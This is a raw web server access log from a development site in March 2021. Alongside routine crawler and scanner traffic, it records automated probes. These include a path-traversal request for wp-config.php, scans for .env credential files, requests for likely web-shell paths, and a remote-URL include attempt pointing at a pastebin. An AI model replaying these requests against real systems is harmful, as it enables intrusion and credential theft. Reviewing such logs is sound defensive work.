2001:4ca0:108:42::24 - - [06/Mar/2021:14:51:08 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:19f0:6c01:2bf9:5400:3ff:fe3b:2cca - - [06/Mar/2021:21:19:49 -0500] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
104.143.83.241 - - [07/Mar/2021:05:48:26 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:19f0:6c01:2bf9:5400:3ff:fe3b:2cca - - [08/Mar/2021:00:55:16 -0500] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
104.143.83.241 - - [08/Mar/2021:06:50:28 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [09/Mar/2021:05:44:30 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.131.163.221 - - [10/Mar/2021:08:40:03 -0500] "GET /config.bak.php HTTP/2.0" 404 16 "-" "python-requests/2.25.1"
104.131.163.221 - - [10/Mar/2021:08:40:26 -0500] "POST /config.bak.php HTTP/1.1" 404 16 "-" "python-requests/2.25.1"
138.246.253.24 - - [11/Mar/2021:02:45:47 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
138.246.253.24 - - [11/Mar/2021:12:51:41 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [12/Mar/2021:05:43:32 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.131.163.64 - - [12/Mar/2021:11:11:27 -0500] "GET /wp-content/db-cache.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.131.163.64 - - [12/Mar/2021:11:12:00 -0500] "POST /wp-content/db-cache.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.143.83.241 - - [13/Mar/2021:06:04:23 -0500] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [13/Mar/2021:08:35:19 -0500] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [13/Mar/2021:10:01:31 -0500] "HEAD / HTTP/2.0" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [14/Mar/2021:06:44:08 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
40.77.167.97 - - [14/Mar/2021:19:47:14 -0400] "GET /robots.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
13.66.139.17 - - [14/Mar/2021:19:47:24 -0400] "GET /index.php?IX=home HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
20.52.181.19 - - [15/Mar/2021:01:22:32 -0400] "GET / HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
104.143.83.241 - - [15/Mar/2021:06:44:20 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.131.163.64 - - [15/Mar/2021:18:13:59 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.131.163.64 - - [15/Mar/2021:18:14:43 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
217.160.45.39 - - [16/Mar/2021:00:32:10 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
217.160.45.39 - - [16/Mar/2021:00:32:50 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
104.143.83.241 - - [16/Mar/2021:06:43:11 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [17/Mar/2021:06:43:38 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [18/Mar/2021:06:42:05 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [19/Mar/2021:06:41:24 -0400] "GET / HTTP/2.0" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
217.160.45.39 - - [19/Mar/2021:06:57:52 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
217.160.45.39 - - [19/Mar/2021:06:58:37 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 196 "-" "python-requests/2.25.1"
138.246.253.24 - - [19/Mar/2021:14:04:18 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
138.246.253.24 - - [20/Mar/2021:02:35:35 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [20/Mar/2021:07:27:23 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [20/Mar/2021:07:42:51 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [20/Mar/2021:11:46:10 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [21/Mar/2021:07:02:19 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
184.154.116.26 - - [21/Mar/2021:13:50:20 -0400] "GET /wp-login.php HTTP/1.1" 404 16 "http://nympdev.davlermedia.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
184.154.116.26 - - [21/Mar/2021:13:50:20 -0400] "GET /wp-login.php HTTP/1.1" 404 16 "http://nympdev.davlermedia.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.143.83.241 - - [22/Mar/2021:06:43:17 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
217.160.45.39 - - [22/Mar/2021:08:19:41 -0400] "GET / HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
104.131.163.64 - - [22/Mar/2021:10:44:49 -0400] "GET /index.php?3x=3x HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
104.131.163.221 - - [22/Mar/2021:12:06:44 -0400] "GET /xmlrp.php?url=https://textbin.net/raw/feemcpvmob HTTP/1.1" 404 16 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
104.131.163.221 - - [22/Mar/2021:12:07:15 -0400] "GET /xmlrp.php?url=https://textbin.net/raw/feemcpvmob HTTP/2.0" 404 16 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:24 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:24 -0400] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:24 -0400] "GET //xmlrpc.php?rsd HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:25 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:25 -0400] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:25 -0400] "GET //web/wp-includes/wlwmanifest.xml HTTP/2.0" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:26 -0400] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:26 -0400] "GET //website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:26 -0400] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:27 -0400] "GET //news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:27 -0400] "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:27 -0400] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:28 -0400] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:28 -0400] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:28 -0400] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:29 -0400] "GET //media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:29 -0400] "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:30 -0400] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:30 -0400] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
52.247.193.79 - - [22/Mar/2021:21:23:30 -0400] "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
104.143.83.241 - - [23/Mar/2021:06:41:29 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [25/Mar/2021:06:41:23 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [26/Mar/2021:07:02:46 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
34.201.105.19 - - [26/Mar/2021:16:03:07 -0400] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:15 -0400] "GET /.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:23 -0400] "GET /api/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:32 -0400] "GET /laravel/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:40 -0400] "GET /test/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:48 -0400] "GET /admin/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:03:56 -0400] "GET /vendor/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:04:05 -0400] "GET /sites/.env HTTP/2.0" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:04:12 -0400] "GET /blog/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:04:20 -0400] "GET /system/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:04:28 -0400] "GET /public/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
34.201.105.19 - - [26/Mar/2021:16:04:36 -0400] "GET /shop/.env HTTP/1.1" 404 196 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
138.246.253.24 - - [26/Mar/2021:18:35:19 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
138.246.253.24 - - [26/Mar/2021:18:54:11 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
104.143.83.241 - - [27/Mar/2021:06:38:51 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
2001:4ca0:108:42::24 - - [27/Mar/2021:09:26:00 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
2001:4ca0:108:42::24 - - [27/Mar/2021:10:33:38 -0400] "HEAD / HTTP/2.0" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:23 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:24 -0400] "GET //wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:25 -0400] "GET //xmlrpc.php?rsd HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:26 -0400] "GET / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:27 -0400] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:28 -0400] "GET //web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:29 -0400] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:30 -0400] "GET //website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:30 -0400] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:31 -0400] "GET //news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:32 -0400] "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:33 -0400] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:34 -0400] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:36 -0400] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:37 -0400] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:38 -0400] "GET //media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:39 -0400] "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:40 -0400] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:41 -0400] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.1.213.218 - - [27/Mar/2021:19:24:42 -0400] "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
104.143.83.241 - - [28/Mar/2021:06:44:14 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [29/Mar/2021:05:38:09 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
221.121.143.35 - - [29/Mar/2021:12:20:17 -0400] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:20:31 -0400] "POST / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:20:40 -0400] "GET /core/.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:20:44 -0400] "POST / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:20:49 -0400] "GET /app/.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:20:55 -0400] "POST / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:21:02 -0400] "GET /public/.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
221.121.143.35 - - [29/Mar/2021:12:21:08 -0400] "POST / HTTP/1.1" 200 5031 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
2001:df0:230:2::7 - - [29/Mar/2021:19:22:26 -0400] "GET /wp-login.php HTTP/2.0" 404 16 "http://nympdev.davlermedia.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
2001:df0:230:2::7 - - [29/Mar/2021:19:22:27 -0400] "GET /wp-login.php HTTP/1.1" 404 16 "http://nympdev.davlermedia.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
104.143.83.241 - - [30/Mar/2021:05:25:26 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
104.143.83.241 - - [31/Mar/2021:05:18:58 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
82.165.48.181 - - [31/Mar/2021:08:40:40 -0400] "GET / HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
40.112.163.29 - - [31/Mar/2021:17:08:45 -0400] "GET /index.php?3x=3x HTTP/1.1" 200 5031 "-" "python-requests/2.25.1"
104.143.83.241 - - [01/Apr/2021:05:25:56 -0400] "GET / HTTP/1.1" 200 5031 "http://nympdev.davlermedia.com/" "Mozilla/5.0 zgrab/0.x"
138.246.253.24 - - [01/Apr/2021:13:06:38 -0400] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36"
